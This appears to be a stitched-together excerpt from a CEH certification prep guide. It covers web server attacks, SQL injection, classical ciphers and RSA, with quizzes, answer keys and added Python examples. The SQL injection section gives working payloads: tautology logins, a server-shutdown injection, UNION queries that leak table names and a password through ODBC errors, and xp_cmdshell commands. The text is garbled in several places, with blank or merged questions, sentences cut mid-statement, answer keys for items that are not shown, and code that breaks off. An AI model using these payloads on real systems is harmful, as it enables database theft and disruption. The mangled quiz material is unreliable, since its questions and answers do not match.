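def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, _ITERATIONS)


USERS = {"whiteknight": (_SALT, _hash_password("correct horse", _SALT))}

# Used for unknown usernames so the failure path does the same work either way;
# a reply that is quicker for unknown names would leak what the message hides.
_DUMMY = (_SALT, _hash_password("placeholder", _SALT))


def leaky_login(username: str, password: str):
    """Enumeration-prone handler: different messages for the two failures."""
    if username not in USERS:
        return False, "Unknown username."
    salt, stored = USERS[username]
    if not hmac.compare_digest(_hash_password(password, salt), stored):
        return False, "Wrong password."
    return True, "Welcome."


def safe_login(username: str, password: str):
    """Consistent handler: one code path, one message, for both failures."""
    salt, stored = USERS.get(username, _DUMMY)
    match = hmac.compare_digest(_hash_password(password, salt), stored)
    if username in USERS and match:
        return True, "Welcome."
    return False, GENERIC_LOGIN_ERROR


# --- XSS: constrain the input stream, then encode what is sent back ---------
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,20}")


def validate_username(raw: str) -> bool:
    """Type, format and range check on a server-side field, the kind of check
    an ASP.NET validator control applies before the value is used."""
    return USERNAME_RE.fullmatch(raw) is not None


def render_greeting(display_name: str) -> str:
    """HtmlEncode-style output encoding: <, >, &, and quotes become entities,
    so markup that arrived in a request or from the database is displayed as
    text rather than run by the browser."""
    return "<p>Hello, " + html.escape(display_name, quote=True) + "</p>"
```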
Assessment Questions
You can find the answers to the following questions in Appendix A.
1.
2. Which one of the following steps is not a part of a client to web server interchange?
a. A TCP connection is established between the client browser and port 80 on a
remote host server through a Uniform Resource Locator (URL).
b. The web server browser processes the HTML tags and presents the Web page on
the client screen.
c. The HTTP web server waits for a GET request message from the client browser on
port 80 for a file on the Web page according to the HTTP protocol.
d. When the server receives the request message, it responds with a status message
(HTTP/1.1 200 OK) and a message containing additional information such as the
HTML text for the requested Web page.
3. The common gateway interface (CGI) and Active Server Page (ASP) dynamic scripting
environment are examples of which one of the following elements?
a. Web applications running on a web server
b. Client-side applications running on a browser
c. Web browser protocols
d. Browser-server interchange protocols
4. Tools such as Nmap, Superscan, and Amap are used primarily for which one of the
following Web attack steps?
a. Banner grabbing
b. Defeating authentication
c. Scanning
d. Attacking the database
5.
6. Apache, Microsoft IIS, and Sun Java System Application refer to which one of the following
entities?
a. Client applications
b. Web server applications
c. HTTP Servers
d. Vulnerability scanners
7. Which one of the following is not one of the three typical attacks used against Microsoft
IIS?
a. Source divergence
b. File system traversal
c. Source disclosure
d. Buffer overflow
8. Which are the two types of Internet Server Application Programming Interface (ISAPI)
programs?
a. ISAPI filters and ISAPI traversals
b. ISAPI traversals and ISAPI extensions
c. ISAPI filters and ISAPI flow matrices
d. ISAPI filters and ISAPI extensions
9. A set of programs called to perform specific functions such as printing is known as which
one of the following?
a. Dynamic loading library (DLL)
b. Function support (FS)
c. Dynamic link library (DLL)
d. Software links (SL)
10. Which one of the following is not an example of a buffer overflow attack against IIS?
a. $DATA attribute
b. IPP Printer Overflow
c. WebDav/nt.dll.dll
d. IISHack.exe
11. Which of the following is useful in banner grabbing?
a. Web cracker
b. Superscan and Nmap
c. Telnet and Netcat
d. SQLbf
12. Which of the following items is a popular web server?
a. Apache
b. Microsoft IIS
c. Sun Java System
d. All of the above
13. The IIS Printer Overflow exploits which one of the following filters?
a. +htr
b. SQL.exe
c. mws3ptr.dll
d. ntdll.dll
14. Which one of the following is not a component involved in an IIS buffer overflow attack?
a. World Wide Web Distributed Authoring and Versioning (WebDAV)
b. IISHack.exe
c. URL encoding
d. Microsoft Data Query file (idg.dll)
15. For security purposes, clients are normally restricted to a partition of the Web server file
system that comprises application software. This area is called:
a. Web document root directory
b. Web cache
c. Client root directory
d. Back door
16. A web server attack that involves a hacker gaining access to restricted areas and files on a
web server is known as which type of attack?
a. Buffer boundary
b. File system traversal
c. Encryption
d. File overflow
17. By inserting special characters in URLs, such as the character sequence ../, an attacker
can initiate which type of attack on a web server?
a. Source disclosure
b. Buffer overflow
c. File system traversal
d. Flood
18. An industry standard that is used to encode characters and that can be used in developing
an attack that exposes files on areas of a web server is called?
a. Hamming code
b. Unicode
c. ASCII
d. Dualcode
19. The encoded strings %c1%1c and %c0%af used in a file system traversal attack represent
which characters that can be used in the attack?
a. %@% or %$%
b. $D$ or %D%
c. \ or /
d. #+# or $+$
20. Which of the following is not a means of protecting against a file system traversal attack?
a. System software located on the same drive as website software and content
directory
b. System software located on a separate drive from website software and content
directory
c. Installing Microsoft IIS Lockdown tool
d. Applying URLScan software
21. A source disclosure attack against the Microsoft Windows NTFS file system exploits a
vulnerability against which one of the following file attributes?
a. $NTFS
b. @ATTR
c. $DATA
d. $CONFIG
22. What type of attack is implemented by submitting a file request that appends +htr to the
global.asa file?
a. Encryption
a. ispc.exe
b. execiis-win32.exe
c. ASN
d. RPC DCOM
31. Which one of the following is a directory traversal attack that uses cmd to execute
commands on an IIS web server?
a. ispc.exe
b. RPC DCOM
c. execiis-win32.exe
d. ASN
32. What is defined as the process of organizing and directing the distribution and installation
of provisional software revisions into production settings?
a. Patch management
b. Data remanence
c. Object reuse
d. Patch verification
33. Which of the following is a justification for installing hot fixes or patches in a timely
manner?
a. The costs associated with the unavailability of computing resources
b. The costs to return a victimized computer to operating condition
c. Potential legal liability
d. All of the above
34. Which one of the following is not a patch support software tool?
a. Qfecheck
b. HFNetChk
c. UpdateExpert
d. Patcheck-I
35. In which Web application attack does an attacker send a specific request to a Web site
that results in the website sending malicious Web or email code to another user?
a. Cross-Site Scripting (XSS)
b. Remote code execution
c. Username enumeration
d. SQL injection
36. In which type of Web application attack is a vulnerability exploited before it is generally
known to the public and, usually, before patches for the vulnerability have been announced
and distributed?
a. Zero-day attack
b. Genesis attack
c. Early attack
d. Initial attack
37. An attack that exploits a vulnerability in XML-RPC PHP programs that could enable the
transfer of unchecked user commands to the eval( ) function in the XML-RPC server is
which one of the following?
a. Remote code execution
b. Username enumeration
c. Cookie/Session poisoning
d. Attack obfuscation
38. An attack that focuses on the database application of a web server and enables a hacker
to acquire sensitive information stored in the database or execute remote code is called
which one of the following?
a. Username enumeration
b. SQL injection
c. DMZ protocol
d. Hidden field
39. The syntax nc -l -p port [-options] [hostname] [port] in which an attack
computer is listening for inbound information is used by what hacking tool that is used for
scanning and banner grabbing?
a. Black Widow
b. Wget
c. Netcat
d. Nikto
40. The ability to copy the structure of a website to a local disk and obtain a complete profile of
the site and all its files and links is best known by which one of the following terms?
a. Website identification
b. Website reviewing
c. Website imaging
d. Website ripping
41. Which Web assessment software is an open source manual exploration tool that
comprises a variety of Visual BASIC applications for analyzing the security posture and
functionality of Web applications?
a. Wget
b. Wikto
c. Websleuth
d. Googler
42. What tool probes for web server vulnerabilities such as vulnerable scripts and directories
and comprises elements that include Back End Miner and Googler?
a. Wikto
b. Nikto
c. Nessus
d. Wget
43. What term describes a primarily Perl-based, open-source program that supports
penetration testing of a variety of operating systems as well as exploit generation and
vulnerability experimentation?
a. cacls.exe
b. Objecteval
c. Metasploit
d. OSploit
44. Which one of the following modifications was not made to IIS 6.0 to enhance security?
a. Installation in locked-down mode
b. Installing a number of services and features by default
c. Default rendering of ASP.NET and ASP inoperative
d. Modifications of Active Server Pages (ASP) components
45. A suspicious hexadecimal entry in an audit file is found to represent the IP address of a
potential hacker. The hexadecimal value is 0xa1.0xb6.0xcd.0x1c. What IP address
does this hex number represent?
a. 201.182.202.27
b. 168.170.206.28
c. 161.182.205.28
d. 128.168.205.20
Answers
1. Answer: b
HTTP resides in the Application Layer of the TCP/IP stack. It is a transport protocol that is used to
exchange information on the World Wide Web between an originating client or user agent such as
a Web browser and a destination or origin server. HTML is a language that supports developing
Web pages on the destination server.
2. Answer: b
The correct statement for answer b should be "The client browser processes the HTML tags and
presents the Web page on the client screen."
3. Answer: a
4. Answer: c
5. Answer: c
Answer a, port 8080, is typically used for the Squid open-source Web proxy cache; answer b, port
443, is usually the default port of HTTPS using encrypted SSL or TLS; and answer d, port 88, is
often used for Kerberos.
6. Answer: c
7. Answer: a
8. Answer: d
9. Answer: c
10. Answer: a
11. Answer: c
Answer a, Web cracker, is used for authentication exploits; answer b, Superscan and Nmap, are
used for web server scanning; and answer d, SQLbf, is used in database attacks.
12. Answer: d
13. Answer: c
14. Answer: c
URL encoding is involved in a file system traversal attack.
15. Answer: a
16. Answer: b
17. Answer: c
18. Answer: b
19. Answer: c
20. Answer: a
File system traversal attack cannot take place across physically different drives.
21. Answer: c
22. Answer: d
23. Answer: b
24. Answer: c
25. Answer: a
Additional Apache attacks include PHP scripting and URL trailing slashes.
26. Answer: b
27. Answer: d
28. Answer: c
29. Answer: c
30. Answer: a
31. Answer: c
32. Answer: a
33. Answer: d
34. Answer: d
35. Answer: a
36. Answer: a
37. Answer: a
38. Answer: b
39. Answer: c
40. Answer: d
41. Answer: c
42. Answer: a
43. Answer: c
44. Answer: b
The correct answer is b because not installing a number of services and features by default is one
of the modifications made to IIS 6.0 to enhance security.
45. Answer: c
A popular and effective attack against database applications on web servers is known as SQL
injection. This type of attack takes advantage of SQL server vulnerabilities, such as lack of proper
input string checking and failure to install critical patches in a timely fashion.
Conducting an Attack
A simple example of an SQL injection attack is to use the single quotation mark or an identity such as
1=1 as part of an input value to a Web page. These values can be inserted into a login as follows:
Login: ron'--
Login: 1=1--
SQL Server ignores everything after a -- because these characters are the single-line comment
sequence in Transact-SQL. They are needed for inputs and queries to terminate without an error. The
; character denotes the end of an SQL query statement.
The values can also be used with a URL, such as:
http://page/index.asp?id=ron'--
http://page/index.asp?id=1=1--
One desired outcome of using a URL is to access an asp page that will link our query to another page
in the database. For example, the following URL contains a variable category of employee with the
value fulltime.
http://page/index.asp?employee=fulltime'
Note that the character ' was added to the value fulltime.
If the injection works as desired, this URL translates into the SQL command:
SELECT * FROM hrdata WHERE Employee='fulltime';
This command can initiate a query that will return not only the full-time employee data but all the other
data from the hrdata table in the database.
Another form of SQL injection is for the user to enter escape characters into parameters of an SQL
statement. This type of attack can then access database information. An example of this type of attack
is shown in the following code:
Statement := "SELECT Username FROM Users WHERE Username = '" + Username + "';"
This statement is designed to query a list of users for a specific entered user name. By manipulating
the username variable, an SQL injection can be initiated to do more than verify a users name. For
example, giving the username variable a value of h' or 'y'='y results in the following SQL
statement:
SELECT Username FROM Users WHERE Username = 'h' or 'y'='y';
When the Username argument is evaluated, 'y'='y' will assess to TRUE, and an authentic
username will be returned.
A variation on this approach is to use the parameter $username = "' or username is not null or
username='". This statement will be executed as follows and provide the entries for all users.
SELECT Username FROM Users WHERE Username='' or Username is not null or Username='';
SQL server provides another command that can be used in SQL injection, namely:
shutdown with nowait
This command will terminate the server operation and implement an attack with the following
responses:
Username: '; shutdown with nowait; --
Password: [Leave blank]
If the SQL server is vulnerable, the following statement will be executed:
Select username from users where
provide the name of the first table in the database and the UNION statement will result in the SQL
server attempting to convert a character string to integer. This conversion will fail, and an error
message of the following type will be returned:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'employeetable' to a column of data type int.
/index.asp, line 6
While the error message provides the information that the string could not be converted to an integer,
it also provides the name of the first table in the database, namely employeetable. Then, by using
the following statement, the name of the next table in the database tables will be returned:
http://page/index.asp?id=20 UNION SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('employeetable')--
If you use the LIKE keyword in the following statement, additional information can be found:
http://page/index.asp?id=20 UNION SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
The term '%25login%25' will be interpreted as %login% by the server. The resulting ODBC error
message would be as follows:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'sys_login' to a column of data type int.
/index.asp, line 6
The ODBC error message identifies a table name as sys_login.
The next step in this SQL injection attack would be to obtain a login name from the sys_login table.
This can be accomplished by the following statement:
http://page/index.asp?id=20 UNION SELECT TOP 1 login_name FROM sys_login--
The resulting ODBC error message provides the login name whiteknight from the sys_login
table:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'whiteknight' to a column of data type int.
/index.asp, line 6
To obtain the password for whiteknight, the following statement can be applied:
http://page/index.asp?id=20 UNION SELECT TOP 1 password FROM sys_login
WHERE login_name='whiteknight'--
The corresponding ODBC error message is:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'rlkfoo3' to a column of data type int.
/index.asp, line 6
Thus, the password for whiteknight is revealed to be rlkfoo3.
Stored Procedures
SQL injection can also take advantage of stored procedures in a web server database. A stored
procedure is a group of SQL statements that is designed to perform a specific task. This approach is
an alternative to having the application layer construct SQL statements dynamically. A stored
procedure can be called by its name and can pass the required parameters to the procedure. An SQL
injection can be initiated if the stored procedure is not employed properly.
One useful procedure in this class is master.dbo.xp_cmdshell, which incorporates the following
syntax:
xp_cmdshell {'command_string'} [, no_output]
The argument 'command_string' is an SQL command.
An example of a stored procedure incorporating master.dbo.xp_cmdshell is the following
construction, which provides employee information from an employee name search:
CREATE PROCEDURE SP_EmployeeSearch @EmployeeName varchar(200) = NULL AS
DECLARE @sql nvarchar(2000)
-- Dynamic SQL: the statement text is assembled by string concatenation at run time
SELECT @sql = ' SELECT EmployeeNum, EmployeeName, Title, Salary ' +
' FROM Employee Where '
IF @EmployeeName IS not NULL
xp_makecab. Supports user generation of a compressed archive of files on the server and files that can be accessed by the server.
exec master..xp_cmdshell 'dir'. Provides a listing of the SQL Server process's current working directory.
Custom extended stored procedures. Can also be developed to execute as part of the SQL Server code.
MS ACCESS            MS SQL         ORACLE
MSysACEs             syscolumns     SYS.USER_CATALOG
MsysQueries          sysobjects     SYS.USER_CONSTRAINTS
MsysObjects                         SYS.USER_OBJECTS
MSysRelationships                   SYS.TAB
                                    SYS.USER_TAB_COLUMNS
                                    SYS.USER_TABLES
                                    SYS.USER_TRIGGERS
                                    SYS.USER_VIEWS
                                    SYS.ALL_TABLES
A series of automated tools have been developed for finding SQL injection vulnerabilities and
supporting SQL injection attacks. A summary of a number of the popular SQL injection tools along
with a brief description of their function is given as follows:
Absinthe. This is an automated tool used to implement SQL injections and retrieve data from a
web server database. The Absinthe screen interface supports entering target data, such as the
URL, Web application injectable parameters, cookies, delays, speedups, and injection options.
The Absinthe screen interface is shown in Figure 14-1.
Automagic SQL. This is an automated injection tool for use against Microsoft SQL server that
supports applying xp_cmdshell, uploading database files, and identifying and browsing tables in
the database.
SSRS. Microsoft SQL Server Resolution Service is susceptible to buffer overflow attacks which
can lead to the server executing arbitrary code, elevating privileges, and compromising the web
server and database.
Osql. Although this utility has been replaced by sqlcmd, it is good to be aware of it. Osql interacts
with a web server using ODBC and supports entering script files, Transact-SQL statements, and
system procedures to the server database.
sqlcmd. This utility supports entering Transact-SQL statements, script files, and system
procedures in SQLCMD mode. It replaces the Osql utility's functions.
SQLDict. This application was developed on Visual FoxPro 8.0 and supports the access of a
variety of relational databases. It provides a common interface to execute SQL commands,
implement and test for dictionary attacks, browse and list database tables, display table
attributes, and export table attributes.
SQLExec. This database utility can be used with a variety of servers to display database tables
and fields and generate SQL commands for different functions. An SQLEXEC() function in Visual
FoxPro sends and executes an SQL command to a data source.
SQLbf. An SQL server brute force or dictionary password cracker, it can be used to decrypt a
password file or guess a password. It can also be used to evaluate the strength of Microsoft SQL
Server passwords offline.
SQLSmack. A Linux-based tool, it can execute remote commands on Microsoft SQL server. The
commands are executed through the master..xp_cmdshell but require a valid username and
password.
SQL2.exe. This UDP buffer overflow remote hacking tool sends a crafted packet to UDP port
1434 on the SQL Server 2000 Resolution Service. The buffer overflow can result in the execution
of malicious code in the server using the xp_cmdshell stored procedure.
SQLBlock. This utility functions as an ODBC data source and inspects SQL statements to
protect access to Web server databases. It will block dangerous and potentially harmful SQL
statements and alert the system administrator.
Acunetix Web Vulnerability Scanner (WVS). An automated scanner that can work in
conjunction with manual utilities to analyze Web applications for vulnerabilities, it can be used for
penetration testing.
WSDigger. This is an open source black box penetration testing Web services framework that
can test for cross site scripting, SQL injection and other types of attack vulnerabilities.
WebInspect. This is an automated tool that can be used to identify Web application
vulnerabilities by dynamically scanning these applications. As part of WebInspect's vulnerability
analysis, this utility will check for and report SQL injection vulnerabilities.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1. Which one of the following is not a vulnerability that might make an SQL injection attack
possible?
a. Failure to install critical patches in a timely fashion
b. Running database applications from a low privilege account
c. Lack of strong typing
d. Not properly checking input strings
2. Which one of the following is an SQL injection attack that identifies the database tables
and forms the basis for other attacks?
a. Database footprinting
b. Quoted injection
c. Database monitoring
d. Select injection
3.
4. What is a standard database access method that provides the ability to access data from
any application, independent of the database management system (DBMS) being used?
a. Schema
b. SQL
c. ODBC
d. UNION
5.
6. Testing a web server database for vulnerabilities is enhanced if a Web page has which one
of the following items?
a. Login boxes
b. Search boxes
c. HTML source code with FORM tags
d. All of the above
7. An SQL statement with a space and the word OR added to the parameter value in the
query to determine if the database is susceptible to SQL injection is known by which one
of the following terms?
a. Auto injection
b. Indirect injection
c. Direct injection
d. Quoted injection
8.
9.
10. SQL server provides a command that will shut down the server and can be used to
implement an SQL injection attack. Which one of the following is that command?
a. close
b. shutdown with nowait
c. end with nowait
d. close with nowait
11. A successful SQL injection attack that occurs when a character string is inserted as a
variable in an SQL statement that is expecting an integer is a result of which one of the
following?
a. Character injection
b. Application of strong typing
c. Lack of strong typing
d. Privilege injection
12. If the character string 1;DROP TABLE TableName is inserted as a variable in an SQL
statement expecting an integer variable, which one of the following SQL injection attacks
will take place?
a. The table TableName will be deleted
b. The table TableName will be renamed
c. The table TableName will be modified
20. Which of the following is not a means of protecting against an SQL injection attack?
a. Filter inputs from cookies
b. Use stored procedures with embedded parameters through safe callable interfaces
c. Use dynamic SQL queries, if possible
d. Eliminate unnecessary accounts
21. Removing unnecessary stored and extended stored procedures is one measure that can
be used to protect against SQL injection attacks. Which one of the following procedures is
a good candidate to consider removing?
a. sp_makewebtask
b. xp_sendmail
c. master..xp_cmdshell
d. All of the above
22. What automated SQL injection vulnerability testing tool employs a screen interface to enter
target Web database information?
a. Absinthe
b. SSAS
c. Asql
d. SQLCheck
23. Which automated SQL injection utility has replaced Osql and supports entering Transact-SQL statements, script files, and system procedures?
a. Absinthe
b. SQLDict
c. sqlcmd
d. SQLCheck
24. The string http://page/index.asp?id=20 UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=salaries WHERE
COLUMN_NAME not IN ('ssnumber')-- results in an ODBC error message that provides
which one of the following?
a. The name of the next column after the salaries column in the table ssnumber
b. The name of the next column after the ssnumber column in the table salaries
c. The name of the next row after the ssnumber row in the table salaries
d. The name of the next row after the salaries row in the table ssnumber
25. The extended procedure exec master..xp_cmdshell 'net1 user' performs
which one of the following functions?
a. Provides a directory tree
b. Provides a list of all computer users
c. Provides a list of available computer drives
d. Identifies server ODBC data sources
26. Which one of the following utilities is especially susceptible to buffer overflow attacks,
which can compromise the web server and database?
a. SSRS
b. Automagic SQL
c. SQLExec
d. SQLbf
27. Which application developed on Visual FoxPro 8.0 provides a common interface to
execute SQL commands, implements and tests for dictionary attacks, browses and lists
database tables, and displays table attributes?
a. WebInspect
b. SQLSmack
c. SQLDict
d. SQLBlock
28. Which one of the following is a SQL server brute force or dictionary password cracker that
is used to decrypt a password file or guess a password?
a. SQLExec
b. ASN
c. WebInspect
d. SQLbf
29. Which one of the following is an open source black box penetration testing Web services
framework that can test for cross site scripting, SQL injection and other types of attack
vulnerabilities?
a. WSDigger
b. SQLBlock
c. SQLSmack
d. Automagic SQL
30. Which one of the following is a utility that functions as an ODBC data source and inspects
SQL statements to protect access to web server databases? It will intercept dangerous
and potentially harmful SQL statements and alert the system administrator.
a. SQL2.exe
b. SQLbf
c. SQLSmack
d. SQLBlock
Answers
1. Answer: b
This safeguard is one of the actions that should be taken to prevent SQL injection attacks.
2. Answer: a
3. Answer: d
4. Answer: c
5. Answer: a
6. Answer: d
7. Answer: c
8. Answer: d
9. Answer: a
10. Answer: b
11. Answer: c
12. Answer: a
13. Answer: c
14. Answer: b
15. Answer: a
16. Answer: c
17. Answer: a
18. Answer: d
19. Answer: a
20. Answer: c
The proper practice is to limit the use of dynamic SQL queries.
21. Answer: d
22. Answer: a
23. Answer: c
24. Answer: b
25. Answer: b
26. Answer: a
27. Answer: c
28. Answer: d
29. Answer: a
30. Answer: d
The most familiar form of cryptography is known as symmetric key (secret key or private key)
cryptography. In symmetric key cryptography, the sender and recipient are required to know a
common secret or key. The sender encrypts the message with the secret key or cryptovariable, as it is
sometimes called, to produce the ciphertext. Then, when the message is received by the recipient, he
or she applies the same secret key to the ciphertext to decrypt the message. Perhaps the most
important security issue in symmetric key encryption is the secure transmission of the secret key from
the sender to the recipient. If the secret key is compromised, the encrypted message can be read by
an unauthorized third party.
Substitution Cipher
The encryption effected by the Caesar cipher can be implemented numerically by using modulo 26
addition. In this method, the letters A to Z of the alphabet are given the values 0 to 25. The message's
characters and repetitions of the key are added together, modulo 26. Therefore, two parameters have
to be specified for the key:
D, the number of repeating letters representing the key
K, the key
The following example illustrates a general substitution cipher using modulo 26 addition. In the
example, D = 3 and K = HAT:
The message is: NO TIME
Assigning numerical values to the message yields:
 N   O   T   I   M   E
13  14  19   8  12   4
Now, the repetitive key of 7 0 19 is added to the letters of the message as follows:
 7   0  19   7   0  19   Repeating Key
13  14  19   8  12   4   Message
In modulo 26 addition, any numerical equivalents equal to or greater than 26 are processed by
subtracting 26 from the sum and using the remainder as the number. The ciphertext in this example
would then become:
20  14  38  15  12  23   Sum
        -26
________________________
20  14  12  15  12  23   Ciphertext Numbers
Translating these numbers back to their corresponding letters of the alphabet results in the following
ciphertext:
 U   O   M   P   M   X   Ciphertext
For the Caesar cipher, D=1 and the key is the letter D, which is equivalent to the number 3.
Taking the same message as an example using the Caesar cipher yields the following:
 3   3   3   3   3   3   Repeating Key
13  14  19   8  12   4   Message
16  17  22  11  15   7   Ciphertext Numbers
 Q   R   W   L   P   H   Ciphertext
A ciphertext that is the result of a substitution algorithm can be attacked through frequency analysis.
In every language, there is a letter used more frequently than any other in a large sample of writing. In
the English language, this letter is e. The next most commonly used letters in order of frequency are t,
a, o, i, n, s, and r. Thus, when observing a large enough sample of ciphertext, the letter e can be
substituted for the ciphertext letter that appears most often. This substitution will give clues to other
letters and, eventually, the cipher can be broken.
This type of cryptanalysis is possible with a monoalphabetic or simple substitution cipher where a
character of ciphertext is substituted for each character of the plaintext. A more difficult cipher to break
uses a different alphabet for every letter substitution. This cipher is called a polyalphabetic cipher,
resulting in the same plaintext letter being converted into a different ciphertext letter during the
encryption process. Because multiple alphabets are used, this cipher cannot be attacked with
frequency analysis. It can, however, be attacked by discovery of the periods when the substitution
repeats.
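The modulo-26 repeating-key cipher worked above, together with the frequency-analysis attack on its D = 1 (Caesar) case and the reason that attack fails once D > 1, as an added example that is not code from the book. The sample text is constructed here so that E is clearly its most frequent letter; the period-finding step the last paragraph mentions is not implemented.

```python
"""Modulo-26 repeating-key substitution (the D/K cipher worked above) and the
frequency-analysis attack on its D = 1 (Caesar) case.

Added example, not code from the CEH Prep Guide. The long plaintext is
constructed here so that E is clearly its most frequent letter."""
from collections import Counter
from typing import List, Set

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

# Constructed sample text: 68 letters, 20 of them E (the next most common, T, has 10).
SAMPLE_TEXT = ("MEET ME AT THE GREEN TREE NEAR THE EAST GATE "
               "WHEN THE EVENING BELL RINGS THREE TIMES")


def to_numbers(text: str) -> List[int]:
    """A..Z -> 0..25; spaces and punctuation are dropped, as in the worked example."""
    return [ALPHABET.index(c) for c in text.upper() if c in ALPHABET]


def to_letters(numbers: List[int]) -> str:
    """0..25 -> A..Z, reducing modulo 26 first."""
    return "".join(ALPHABET[n % 26] for n in numbers)


def encrypt(message: str, key: str) -> str:
    """Add the key (D = len(key)), repeated, to the message modulo 26."""
    k = to_numbers(key)
    return to_letters([m + k[i % len(k)] for i, m in enumerate(to_numbers(message))])


def decrypt(ciphertext: str, key: str) -> str:
    """Subtract the repeated key modulo 26 (the inverse of encrypt)."""
    k = to_numbers(key)
    return to_letters([c - k[i % len(k)] for i, c in enumerate(to_numbers(ciphertext))])


def caesar(message: str) -> str:
    """The Caesar cipher is the D = 1 case with key letter D (shift 3)."""
    return encrypt(message, "D")


def guess_caesar_shift(ciphertext: str) -> int:
    """Frequency analysis for a monoalphabetic shift: assume the most common
    ciphertext letter stands for plaintext E and solve for the shift."""
    most_common = Counter(to_numbers(ciphertext)).most_common(1)[0][0]
    return (most_common - ALPHABET.index("E")) % 26


def ciphertext_letters_for(message: str, key: str, letter: str) -> Set[str]:
    """Which ciphertext letters one plaintext letter turns into. For a
    monoalphabetic key this is a single letter; for a polyalphabetic key
    (D > 1) it is several, which is why plain frequency analysis fails."""
    plain = to_numbers(message)
    cipher = encrypt(message, key)
    target = ALPHABET.index(letter.upper())
    return {cipher[i] for i, p in enumerate(plain) if p == target}


if __name__ == "__main__":
    print(encrypt("NO TIME", "HAT"))                         # UOMPMX
    print(caesar("NO TIME"))                                 # QRWLPH
    print(guess_caesar_shift(caesar(SAMPLE_TEXT)))           # 3
    print(ciphertext_letters_for(SAMPLE_TEXT, "D", "E"))     # {'H'}
    print(ciphertext_letters_for(SAMPLE_TEXT, "HAT", "E"))   # {'E', 'L', 'X'}
```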
Triple DES
Because of the weakness of DES, multiple encryptions with DES have been developed; however,
double encryption using DES is no more secure than using a single DES key. Three encryptions,
called Triple DES, can provide more secure encryption and can be implemented in a number of ways,
using different encryption keys. For example, a message can be encrypted with Key 1, decrypted with
Key 2 (essentially another encryption), and encrypted again with Key 1. These processes can be
denoted symbolically by the following representation, where E represents an encryption, D represents
a decryption, and the Ks indicate an encryption key:
E{D[E(M,K1),K2],K1}
This Triple DES encryption is known as DES-EDE2. Similarly, if three encryptions are performed with
three different keys, the process is identified as DES-EEE3 and is represented as follows:
E{E[E(M,K1),K2],K3}
DES-EEE3 is considered the most secure of the Triple DES encryptions.
RC5/RC6
RC5 is a patented family of symmetric cryptographic algorithms with variable block lengths introduced
in 1994. The algorithms were developed by Ronald Rivest and support variable key lengths up to
2,048 bits with typical block sizes of 32, 64, or 128 bits. The RC6 cipher is an upgrade of RC5, and
operates at a faster speed than RC5.
a hybrid system makes use of the strength of both symmetric and asymmetric ciphers by using public
key cryptography to distribute safely the secret keys used in symmetric key cryptography.
Public key cryptography was advanced by a 1976 paper delivered by Dr. W. Diffie and Dr. M. E.
Hellman entitled "New Directions in Cryptography" (Whitfield Diffie and Martin Hellman, "New
Directions in Cryptography," IEEE Transactions on Information Theory, Vol. IT-22, November 1976,
pp. 644-654). In this paper, Diffie and Hellman described a secure method of exchanging secret keys
over a nonsecure medium. This approach is called the Diffie-Hellman key exchange and was the
precursor to public key cryptography.
One-Way Functions
One-way functions are used to generate the public key from the private key. They are called one-way
functions because it is easy to generate the public key from the private key, but very difficult to do the
reverse. In mathematical terms, if y = f(x), it would be easy to compute y if given x, but it would be
very difficult to derive x when given y. A typical example of a one-way function is searching the listings
in a telephone book. It is easy to find a number given a name, but difficult to find a name given the
phone number. Some one-way functions have a trap door. A trap door is a mechanism that easily
enables you to compute the reverse function in a one-way function.
RSA
The RSA public key cryptosystem was developed by Rivest, Shamir, and Adleman (R. L. Rivest, A.
Shamir, and L. M. Adleman, "A Method for Obtaining Digital Signatures and Public-Key
Cryptosystems," Communications of the ACM, v. 21, n. 2, Feb 1978, pp. 120-126). The initials of their
last names were used to identify the algorithm and also the information security company they
founded. RSA can be used for encryption, key exchange, and digital signatures.
The RSA public key algorithm is based on the difficulty of factoring a number, N, which is the product
of two large prime numbers. These prime numbers might be on the order of 200 digits each. In this
algorithm, the public key is generated from the private key from the product of two large prime
numbers. This multiplication is not difficult, but the reverse operation to find the private key from the
public key is very difficult. This reverse operation requires finding the prime factors of the product,
characterizing a hard, one-way function. In RSA, public and private keys are generated as follows:
1. Choose two large prime numbers, p and q, of equal length, and compute p × q = n, which is
the public modulus.
2. Choose a random public key, e, so that e and (p - 1)(q - 1) are relatively prime. (Two numbers
are relatively prime when their greatest common divisor is 1.)
3. Compute e × d = 1 mod (p - 1)(q - 1), where d is the private key.
4. Thus, d = e^-1 mod [(p - 1)(q - 1)].
From these calculations, (d, n) is the private key, and (e, n) is the public key.
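The four steps above carried out in code, with a round trip and a toy demonstration of the "reverse operation" the text calls hard. This is an added example, not code from the book; the primes p = 61, q = 53 and e = 17 are deliberately tiny so each step can be checked by hand, and pow(e, -1, m) needs Python 3.8 or later.

```python
"""RSA key generation following the four steps listed above, with a small
encryption/decryption round trip and a demonstration of why n must be large.

Added example, not code from the CEH Prep Guide; the primes are deliberately
tiny (p = 61, q = 53) so every step can be checked by hand."""
from math import gcd, isqrt
from typing import Tuple

Key = Tuple[int, int]


def rsa_keygen(p: int, q: int, e: int) -> Tuple[Key, Key]:
    """Return ((e, n), (d, n)): the public key and the private key."""
    n = p * q                       # step 1: the public modulus
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:            # step 2: e must be relatively prime to (p-1)(q-1)
        raise ValueError("e and (p-1)(q-1) are not relatively prime")
    d = pow(e, -1, phi)             # steps 3 and 4: d = e^-1 mod (p-1)(q-1)
    assert (e * d) % phi == 1
    return (e, n), (d, n)


def rsa_encrypt(m: int, public: Key) -> int:
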